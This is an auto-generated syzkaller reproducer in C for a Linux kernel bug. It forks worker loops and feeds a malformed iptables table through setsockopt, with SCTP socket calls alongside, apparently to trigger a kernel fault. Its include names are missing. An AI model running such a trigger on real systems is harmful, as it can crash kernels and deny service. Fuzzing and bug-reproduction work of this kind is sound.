// https://syzkaller.appspot.com/bug?id=be2e39518462291fd049f665261632ded34b79fd // autogenerated by syzkaller (http://github.com/google/syzkaller) #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include __attribute__((noreturn)) static void doexit(int status) { volatile unsigned i; syscall(__NR_exit_group, status); for (i = 0;; i++) { } } #include #include const int kFailStatus = 67; const int kRetryStatus = 69; static void fail(const char* msg, ...) { int e = errno; va_list args; va_start(args, msg); vfprintf(stderr, msg, args); va_end(args); fprintf(stderr, " (errno %d)\n", e); doexit((e == ENOMEM || e == EAGAIN) ? kRetryStatus : kFailStatus); } static uint64_t current_time_ms() { struct timespec ts; if (clock_gettime(CLOCK_MONOTONIC, &ts)) fail("clock_gettime failed"); return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000; } struct ipt_getinfo { char name[32]; unsigned int valid_hooks; unsigned int hook_entry[5]; unsigned int underflow[5]; unsigned int num_entries; unsigned int size; }; struct ipt_get_entries { char name[32]; unsigned int size; void* entrytable[1024 / sizeof(void*)]; }; struct xt_counters { uint64_t pcnt, bcnt; }; struct ipt_replace { char name[32]; unsigned int valid_hooks; unsigned int num_entries; unsigned int size; unsigned int hook_entry[5]; unsigned int underflow[5]; unsigned int num_counters; struct xt_counters* counters; char entrytable[1024]; }; struct ipt_table_desc { const char* name; struct ipt_getinfo info; struct ipt_get_entries entries; struct ipt_replace replace; struct xt_counters counters[10]; }; static struct ipt_table_desc ipv4_tables[] = { {.name = "filter"}, {.name = "nat"}, {.name = "mangle"}, {.name = "raw"}, {.name = "security"}, }; #define IPT_BASE_CTL 64 #define IPT_SO_SET_REPLACE (IPT_BASE_CTL) #define IPT_SO_GET_INFO (IPT_BASE_CTL) #define IPT_SO_GET_ENTRIES (IPT_BASE_CTL + 1) static void checkpoint_net_namespace(void) { socklen_t optlen; unsigned i; int fd; fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (fd == -1) fail("socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)"); for (i = 0; i < sizeof(ipv4_tables) / sizeof(ipv4_tables[0]); i++) { struct ipt_table_desc* table = &ipv4_tables[i]; strcpy(table->info.name, table->name); strcpy(table->entries.name, table->name); strcpy(table->replace.name, table->name); optlen = sizeof(table->info); if (getsockopt(fd, SOL_IP, IPT_SO_GET_INFO, &table->info, &optlen)) { switch (errno) { case EPERM: case ENOENT: case ENOPROTOOPT: continue; } fail("getsockopt(IPT_SO_GET_INFO)"); } if (table->info.size > sizeof(table->entries.entrytable)) fail("table size is too large: %u", table->info.size); if (table->info.num_entries > sizeof(table->counters) / sizeof(table->counters[0])) fail("too many counters: %u", table->info.num_entries); table->entries.size = table->info.size; optlen = sizeof(table->entries) - sizeof(table->entries.entrytable) + table->info.size; if (getsockopt(fd, SOL_IP, IPT_SO_GET_ENTRIES, &table->entries, &optlen)) fail("getsockopt(IPT_SO_GET_ENTRIES)"); table->replace.valid_hooks = table->info.valid_hooks; table->replace.num_entries = table->info.num_entries; table->replace.counters = table->counters; table->replace.size = table->info.size; memcpy(table->replace.hook_entry, table->info.hook_entry, sizeof(table->replace.hook_entry)); memcpy(table->replace.underflow, table->info.underflow, sizeof(table->replace.underflow)); memcpy(table->replace.entrytable, table->entries.entrytable, table->info.size); } close(fd); } static void reset_net_namespace(void) { struct ipt_get_entries entries; struct ipt_getinfo info; socklen_t optlen; unsigned i; int fd; memset(&info, 0, sizeof(info)); memset(&entries, 0, sizeof(entries)); fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (fd == -1) fail("socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)"); for (i = 0; i < sizeof(ipv4_tables) / sizeof(ipv4_tables[0]); i++) { struct ipt_table_desc* table = &ipv4_tables[i]; if (table->info.valid_hooks == 0) continue; strcpy(info.name, table->name); optlen = sizeof(info); if (getsockopt(fd, SOL_IP, IPT_SO_GET_INFO, &info, &optlen)) fail("getsockopt(IPT_SO_GET_INFO)"); if (memcmp(&table->info, &info, sizeof(table->info)) == 0) { strcpy(entries.name, table->name); entries.size = table->info.size; optlen = sizeof(entries) - sizeof(entries.entrytable) + entries.size; if (getsockopt(fd, SOL_IP, IPT_SO_GET_ENTRIES, &entries, &optlen)) fail("getsockopt(IPT_SO_GET_ENTRIES)"); if (memcmp(&table->entries, &entries, optlen) == 0) continue; } table->replace.num_counters = info.num_entries; optlen = sizeof(table->replace) - sizeof(table->replace.entrytable) + table->replace.size; if (setsockopt(fd, SOL_IP, IPT_SO_SET_REPLACE, &table->replace, optlen)) fail("setsockopt(IPT_SO_SET_REPLACE)"); } close(fd); } static void test(); void loop() { int iter; checkpoint_net_namespace(); for (iter = 0;; iter++) { int pid = fork(); if (pid < 0) fail("loop fork failed"); if (pid == 0) { prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0); setpgrp(); test(); doexit(0); } int status = 0; uint64_t start = current_time_ms(); for (;;) { int res = waitpid(-1, &status, __WALL | WNOHANG); if (res == pid) break; usleep(1000); if (current_time_ms() - start > 5 * 1000) { kill(-pid, SIGKILL); kill(pid, SIGKILL); while (waitpid(-1, &status, __WALL) != pid) { } break; } } reset_net_namespace(); } } long r[2]; uint64_t procid; void test() { memset(r, -1, sizeof(r)); syscall(__NR_mmap, 0x20000000, 0xfff000, 3, 0x32, -1, 0); syscall(__NR_epoll_ctl, -1, 2, -1); *(uint32_t*)0x20004000 = 0x7fffffff; syscall(__NR_setsockopt, -1, 0x84, 0x20, 0x20004000, 4); *(uint32_t*)0x209ba000 = 0x10; r[0] = syscall(__NR_accept, -1, 0x20ac7000, 0x209ba000); *(uint16_t*)0x20000000 = 0x1a; *(uint16_t*)0x20000002 = htobe16(0); *(uint8_t*)0x20000004 = 0xd4; *(uint8_t*)0x20000005 = 0; *(uint8_t*)0x20000006 = 8; *(uint8_t*)0x20000007 = 5; *(uint8_t*)0x20000008 = 0xaa; *(uint8_t*)0x20000009 = 0xaa; *(uint8_t*)0x2000000a = 0xaa; *(uint8_t*)0x2000000b = 0xaa; *(uint8_t*)0x2000000c = 0 + procid * 1; *(uint8_t*)0x2000000d = 0xbb; *(uint8_t*)0x2000000e = 0; *(uint8_t*)0x2000000f = 0; syscall(__NR_bind, r[0], 0x20000000, 0x10); *(uint32_t*)0x20005000 = 0x7fffffff; syscall(__NR_setsockopt, -1, 0x84, 0x21, 0x20005000, 4); *(uint32_t*)0x20006fb0 = 0; *(uint32_t*)0x20006fb4 = 0; *(uint32_t*)0x20003ffc = 8; syscall(__NR_getsockopt, -1, 0x84, 0x1b, 0x20006fb0, 0x20003ffc); r[1] = syscall(__NR_socket, 2, 0x80005, 0); memcpy((void*)0x204c6000, "\x66\x69\x6c\x74\x65\x72\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00", 32); *(uint32_t*)0x204c6020 = 0xe; *(uint32_t*)0x204c6024 = 4; *(uint32_t*)0x204c6028 = 0xfffffee1; *(uint32_t*)0x204c602c = -1; *(uint32_t*)0x204c6030 = 0; *(uint32_t*)0x204c6034 = 0; *(uint32_t*)0x204c6038 = 0; *(uint32_t*)0x204c603c = -1; *(uint32_t*)0x204c6040 = -1; *(uint32_t*)0x204c6044 = 0; *(uint32_t*)0x204c6048 = 0; *(uint32_t*)0x204c604c = 0; *(uint32_t*)0x204c6050 = -1; *(uint32_t*)0x204c6054 = 4; *(uint64_t*)0x204c6058 = 0x20001000; *(uint8_t*)0x204c6060 = 0; *(uint8_t*)0x204c6061 = 0; *(uint8_t*)0x204c6062 = 0; *(uint8_t*)0x204c6063 = 0; *(uint8_t*)0x204c6064 = 0; *(uint8_t*)0x204c6065 = 0; *(uint8_t*)0x204c6066 = 0; *(uint8_t*)0x204c6067 = 0; *(uint8_t*)0x204c6068 = 0; *(uint8_t*)0x204c6069 = 0; *(uint8_t*)0x204c606a = 0; *(uint8_t*)0x204c606b = 0; *(uint8_t*)0x204c606c = 0; *(uint8_t*)0x204c606d = 0; *(uint8_t*)0x204c606e = 0; *(uint8_t*)0x204c606f = 0; *(uint8_t*)0x204c6070 = 0; *(uint8_t*)0x204c6071 = 0; *(uint8_t*)0x204c6072 = 0; *(uint8_t*)0x204c6073 = 0; *(uint8_t*)0x204c6074 = 0; *(uint8_t*)0x204c6075 = 0; *(uint8_t*)0x204c6076 = 0; *(uint8_t*)0x204c6077 = 0; *(uint8_t*)0x204c6078 = 0; *(uint8_t*)0x204c6079 = 0; *(uint8_t*)0x204c607a = 0; *(uint8_t*)0x204c607b = 0; *(uint8_t*)0x204c607c = 0; *(uint8_t*)0x204c607d = 0; *(uint8_t*)0x204c607e = 0; *(uint8_t*)0x204c607f = 0; *(uint8_t*)0x204c6080 = 0; *(uint8_t*)0x204c6081 = 0; *(uint8_t*)0x204c6082 = 0; *(uint8_t*)0x204c6083 = 0; *(uint8_t*)0x204c6084 = 0; *(uint8_t*)0x204c6085 = 0; *(uint8_t*)0x204c6086 = 0; *(uint8_t*)0x204c6087 = 0; *(uint8_t*)0x204c6088 = 0; *(uint8_t*)0x204c6089 = 0; *(uint8_t*)0x204c608a = 0; *(uint8_t*)0x204c608b = 0; *(uint8_t*)0x204c608c = 0; *(uint8_t*)0x204c608d = 0; *(uint8_t*)0x204c608e = 0; *(uint8_t*)0x204c608f = 0; *(uint8_t*)0x204c6090 = 0; *(uint8_t*)0x204c6091 = 0; *(uint8_t*)0x204c6092 = 0; *(uint8_t*)0x204c6093 = 0; *(uint8_t*)0x204c6094 = 0; *(uint8_t*)0x204c6095 = 0; *(uint8_t*)0x204c6096 = 0; *(uint8_t*)0x204c6097 = 0; *(uint8_t*)0x204c6098 = 0; *(uint8_t*)0x204c6099 = 0; *(uint8_t*)0x204c609a = 0; *(uint8_t*)0x204c609b = 0; *(uint8_t*)0x204c609c = 0; *(uint8_t*)0x204c609d = 0; *(uint8_t*)0x204c609e = 0; *(uint8_t*)0x204c609f = 0; *(uint8_t*)0x204c60a0 = 0; *(uint8_t*)0x204c60a1 = 0; *(uint8_t*)0x204c60a2 = 0; *(uint8_t*)0x204c60a3 = 0; *(uint8_t*)0x204c60a4 = 0; *(uint8_t*)0x204c60a5 = 0; *(uint8_t*)0x204c60a6 = 0; *(uint8_t*)0x204c60a7 = 0; *(uint8_t*)0x204c60a8 = 0; *(uint8_t*)0x204c60a9 = 0; *(uint8_t*)0x204c60aa = 0; *(uint8_t*)0x204c60ab = 0; *(uint8_t*)0x204c60ac = 0; *(uint8_t*)0x204c60ad = 0; *(uint8_t*)0x204c60ae = 0; *(uint8_t*)0x204c60af = 0; *(uint8_t*)0x204c60b0 = 0; *(uint8_t*)0x204c60b1 = 0; *(uint8_t*)0x204c60b2 = 0; *(uint8_t*)0x204c60b3 = 0; *(uint32_t*)0x204c60b4 = 0; *(uint16_t*)0x204c60b8 = 0x70; *(uint16_t*)0x204c60ba = 0x98; *(uint32_t*)0x204c60bc = 0; *(uint64_t*)0x204c60c0 = 0; *(uint64_t*)0x204c60c8 = 0; *(uint16_t*)0x204c60d0 = 0x28; memcpy((void*)0x204c60d2, "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00", 29); *(uint8_t*)0x204c60ef = 0; *(uint32_t*)0x204c60f0 = 0xfffffffe; *(uint32_t*)0x204c60f8 = htobe32(-1); *(uint8_t*)0x204c60fc = 0xac; *(uint8_t*)0x204c60fd = 0x14; *(uint8_t*)0x204c60fe = 0; *(uint8_t*)0x204c60ff = 0xbb; *(uint32_t*)0x204c6100 = htobe32(0); *(uint32_t*)0x204c6104 = htobe32(0); memcpy((void*)0x204c6108, "\x62\x63\x73\x68\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 16); *(uint8_t*)0x204c6118 = 0x73; *(uint8_t*)0x204c6119 = 0x79; *(uint8_t*)0x204c611a = 0x7a; *(uint8_t*)0x204c611b = 0; *(uint8_t*)0x204c611c = 0; *(uint8_t*)0x204c6128 = -1; *(uint8_t*)0x204c6129 = 0; *(uint8_t*)0x204c612a = 0; *(uint8_t*)0x204c612b = 0; *(uint8_t*)0x204c612c = 0; *(uint8_t*)0x204c612d = 0; *(uint8_t*)0x204c612e = 0; *(uint8_t*)0x204c612f = 0; *(uint8_t*)0x204c6130 = 0; *(uint8_t*)0x204c6131 = 0; *(uint8_t*)0x204c6132 = 0; *(uint8_t*)0x204c6133 = 0; *(uint8_t*)0x204c6134 = 0; *(uint8_t*)0x204c6135 = 0; *(uint8_t*)0x204c6136 = 0; *(uint8_t*)0x204c6137 = 0; *(uint8_t*)0x204c6138 = 0; *(uint8_t*)0x204c6139 = 0; *(uint8_t*)0x204c613a = 0; *(uint8_t*)0x204c613b = 0; *(uint8_t*)0x204c613c = 0; *(uint8_t*)0x204c613d = 0; *(uint8_t*)0x204c613e = 0; *(uint8_t*)0x204c613f = 0; *(uint8_t*)0x204c6140 = 0; *(uint8_t*)0x204c6141 = 0; *(uint8_t*)0x204c6142 = 0; *(uint8_t*)0x204c6143 = 0; *(uint8_t*)0x204c6144 = 0; *(uint8_t*)0x204c6145 = 0; *(uint8_t*)0x204c6146 = 0; *(uint8_t*)0x204c6147 = 0; *(uint16_t*)0x204c6148 = 0; *(uint8_t*)0x204c614a = 0; *(uint8_t*)0x204c614b = 0; *(uint32_t*)0x204c614c = 0; *(uint16_t*)0x204c6150 = 0x70; *(uint16_t*)0x204c6152 = 0x98; *(uint32_t*)0x204c6154 = 0; *(uint64_t*)0x204c6158 = 0; *(uint64_t*)0x204c6160 = 0; *(uint16_t*)0x204c6168 = 0x28; memcpy((void*)0x204c616a, "\x52\x45\x4a\x45\x43\x54\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00", 29); *(uint8_t*)0x204c6187 = 0; *(uint32_t*)0x204c6188 = 0; *(uint8_t*)0x204c6190 = 0; *(uint8_t*)0x204c6191 = 0; *(uint8_t*)0x204c6192 = 0; *(uint8_t*)0x204c6193 = 0; *(uint8_t*)0x204c6194 = 0; *(uint8_t*)0x204c6195 = 0; *(uint8_t*)0x204c6196 = 0; *(uint8_t*)0x204c6197 = 0; *(uint8_t*)0x204c6198 = 0; *(uint8_t*)0x204c6199 = 0; *(uint8_t*)0x204c619a = 0; *(uint8_t*)0x204c619b = 0; *(uint8_t*)0x204c619c = 0; *(uint8_t*)0x204c619d = 0; *(uint8_t*)0x204c619e = 0; *(uint8_t*)0x204c619f = 0; *(uint8_t*)0x204c61a0 = 0; *(uint8_t*)0x204c61a1 = 0; *(uint8_t*)0x204c61a2 = 0; *(uint8_t*)0x204c61a3 = 0; *(uint8_t*)0x204c61a4 = 0; *(uint8_t*)0x204c61a5 = 0; *(uint8_t*)0x204c61a6 = 0; *(uint8_t*)0x204c61a7 = 0; *(uint8_t*)0x204c61a8 = 0; *(uint8_t*)0x204c61a9 = 0; *(uint8_t*)0x204c61aa = 0; *(uint8_t*)0x204c61ab = 0; *(uint8_t*)0x204c61ac = 0; *(uint8_t*)0x204c61ad = 0; *(uint8_t*)0x204c61ae = 0; *(uint8_t*)0x204c61af = 0; *(uint8_t*)0x204c61b0 = 0; *(uint8_t*)0x204c61b1 = 0; *(uint8_t*)0x204c61b2 = 0; *(uint8_t*)0x204c61b3 = 0; *(uint8_t*)0x204c61b4 = 0; *(uint8_t*)0x204c61b5 = 0; *(uint8_t*)0x204c61b6 = 0; *(uint8_t*)0x204c61b7 = 0; *(uint8_t*)0x204c61b8 = 0; *(uint8_t*)0x204c61b9 = 0; *(uint8_t*)0x204c61ba = 0; *(uint8_t*)0x204c61bb = 0; *(uint8_t*)0x204c61bc = 0; *(uint8_t*)0x204c61bd = 0; *(uint8_t*)0x204c61be = 0; *(uint8_t*)0x204c61bf = 0; *(uint8_t*)0x204c61c0 = 0; *(uint8_t*)0x204c61c1 = 0; *(uint8_t*)0x204c61c2 = 0; *(uint8_t*)0x204c61c3 = 0; *(uint8_t*)0x204c61c4 = 0; *(uint8_t*)0x204c61c5 = 0; *(uint8_t*)0x204c61c6 = 0; *(uint8_t*)0x204c61c7 = 0; *(uint8_t*)0x204c61c8 = 0; *(uint8_t*)0x204c61c9 = 0; *(uint8_t*)0x204c61ca = 0; *(uint8_t*)0x204c61cb = 0; *(uint8_t*)0x204c61cc = 0; *(uint8_t*)0x204c61cd = 0; *(uint8_t*)0x204c61ce = 0; *(uint8_t*)0x204c61cf = 0; *(uint8_t*)0x204c61d0 = 0; *(uint8_t*)0x204c61d1 = 0; *(uint8_t*)0x204c61d2 = 0; *(uint8_t*)0x204c61d3 = 0; *(uint8_t*)0x204c61d4 = 0; *(uint8_t*)0x204c61d5 = 0; *(uint8_t*)0x204c61d6 = 0; *(uint8_t*)0x204c61d7 = 0; *(uint8_t*)0x204c61d8 = 0; *(uint8_t*)0x204c61d9 = 0; *(uint8_t*)0x204c61da = 0; *(uint8_t*)0x204c61db = 0; *(uint8_t*)0x204c61dc = 0; *(uint8_t*)0x204c61dd = 0; *(uint8_t*)0x204c61de = 0; *(uint8_t*)0x204c61df = 0; *(uint8_t*)0x204c61e0 = 0; *(uint8_t*)0x204c61e1 = 0; *(uint8_t*)0x204c61e2 = 0; *(uint8_t*)0x204c61e3 = 0; *(uint32_t*)0x204c61e4 = 0; *(uint16_t*)0x204c61e8 = 0x70; *(uint16_t*)0x204c61ea = 0x98; *(uint32_t*)0x204c61ec = 0; *(uint64_t*)0x204c61f0 = 0; *(uint64_t*)0x204c61f8 = 0; *(uint16_t*)0x204c6200 = 0x28; memcpy((void*)0x204c6202, "\x41\x55\x44\x49\x54\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00", 29); *(uint8_t*)0x204c621f = 0; *(uint8_t*)0x204c6220 = 3; *(uint8_t*)0x204c6228 = 0; *(uint8_t*)0x204c6229 = 0; *(uint8_t*)0x204c622a = 0; *(uint8_t*)0x204c622b = 0; *(uint8_t*)0x204c622c = 0; *(uint8_t*)0x204c622d = 0; *(uint8_t*)0x204c622e = 0; *(uint8_t*)0x204c622f = 0; *(uint8_t*)0x204c6230 = 0; *(uint8_t*)0x204c6231 = 0; *(uint8_t*)0x204c6232 = 0; *(uint8_t*)0x204c6233 = 0; *(uint8_t*)0x204c6234 = 0; *(uint8_t*)0x204c6235 = 0; *(uint8_t*)0x204c6236 = 0; *(uint8_t*)0x204c6237 = 0; *(uint8_t*)0x204c6238 = 0; *(uint8_t*)0x204c6239 = 0; *(uint8_t*)0x204c623a = 0; *(uint8_t*)0x204c623b = 0; *(uint8_t*)0x204c623c = 0; *(uint8_t*)0x204c623d = 0; *(uint8_t*)0x204c623e = 0; *(uint8_t*)0x204c623f = 0; *(uint8_t*)0x204c6240 = 0; *(uint8_t*)0x204c6241 = 0; *(uint8_t*)0x204c6242 = 0; *(uint8_t*)0x204c6243 = 0; *(uint8_t*)0x204c6244 = 0; *(uint8_t*)0x204c6245 = 0; *(uint8_t*)0x204c6246 = 0; *(uint8_t*)0x204c6247 = 0; *(uint8_t*)0x204c6248 = 0; *(uint8_t*)0x204c6249 = 0; *(uint8_t*)0x204c624a = 0; *(uint8_t*)0x204c624b = 0; *(uint8_t*)0x204c624c = 0; *(uint8_t*)0x204c624d = 0; *(uint8_t*)0x204c624e = 0; *(uint8_t*)0x204c624f = 0; *(uint8_t*)0x204c6250 = 0; *(uint8_t*)0x204c6251 = 0; *(uint8_t*)0x204c6252 = 0; *(uint8_t*)0x204c6253 = 0; *(uint8_t*)0x204c6254 = 0; *(uint8_t*)0x204c6255 = 0; *(uint8_t*)0x204c6256 = 0; *(uint8_t*)0x204c6257 = 0; *(uint8_t*)0x204c6258 = 0; *(uint8_t*)0x204c6259 = 0; *(uint8_t*)0x204c625a = 0; *(uint8_t*)0x204c625b = 0; *(uint8_t*)0x204c625c = 0; *(uint8_t*)0x204c625d = 0; *(uint8_t*)0x204c625e = 0; *(uint8_t*)0x204c625f = 0; *(uint8_t*)0x204c6260 = 0; *(uint8_t*)0x204c6261 = 0; *(uint8_t*)0x204c6262 = 0; *(uint8_t*)0x204c6263 = 0; *(uint8_t*)0x204c6264 = 0; *(uint8_t*)0x204c6265 = 0; *(uint8_t*)0x204c6266 = 0; *(uint8_t*)0x204c6267 = 0; *(uint8_t*)0x204c6268 = 0; *(uint8_t*)0x204c6269 = 0; *(uint8_t*)0x204c626a = 0; *(uint8_t*)0x204c626b = 0; *(uint8_t*)0x204c626c = 0; *(uint8_t*)0x204c626d = 0; *(uint8_t*)0x204c626e = 0; *(uint8_t*)0x204c626f = 0; *(uint8_t*)0x204c6270 = 0; *(uint8_t*)0x204c6271 = 0; *(uint8_t*)0x204c6272 = 0; *(uint8_t*)0x204c6273 = 0; *(uint8_t*)0x204c6274 = 0; *(uint8_t*)0x204c6275 = 0; *(uint8_t*)0x204c6276 = 0; *(uint8_t*)0x204c6277 = 0; *(uint8_t*)0x204c6278 = 0; *(uint8_t*)0x204c6279 = 0; *(uint8_t*)0x204c627a = 0; *(uint8_t*)0x204c627b = 0; *(uint32_t*)0x204c627c = 0; *(uint16_t*)0x204c6280 = 0x70; *(uint16_t*)0x204c6282 = 0xb8; *(uint32_t*)0x204c6284 = 0; *(uint64_t*)0x204c6288 = 0; *(uint64_t*)0x204c6290 = 0; *(uint16_t*)0x204c6298 = 0x48; memcpy((void*)0x204c629a, "\x4c\x45\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00", 29); *(uint8_t*)0x204c62b7 = 0; memcpy((void*)0x204c62b8, "\x73\x79\x7a\x30\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00", 27); *(uint8_t*)0x204c62d3 = 0; *(uint32_t*)0x204c62d4 = 0; *(uint64_t*)0x204c62d8 = 0; *(uint64_t*)0x20001000 = 0; *(uint64_t*)0x20001008 = 0; *(uint64_t*)0x20001010 = 0; *(uint64_t*)0x20001018 = 0; *(uint64_t*)0x20001020 = 0; *(uint64_t*)0x20001028 = 0; *(uint64_t*)0x20001030 = 0; *(uint64_t*)0x20001038 = 0; syscall(__NR_setsockopt, r[1], 0, 0x40, 0x204c6000, 0x2e0); syscall(__NR_socket, 1, 1, 0); } int main() { for (procid = 0; procid < 8; procid++) { if (fork() == 0) { for (;;) { loop(); } } } sleep(1000000); return 0; }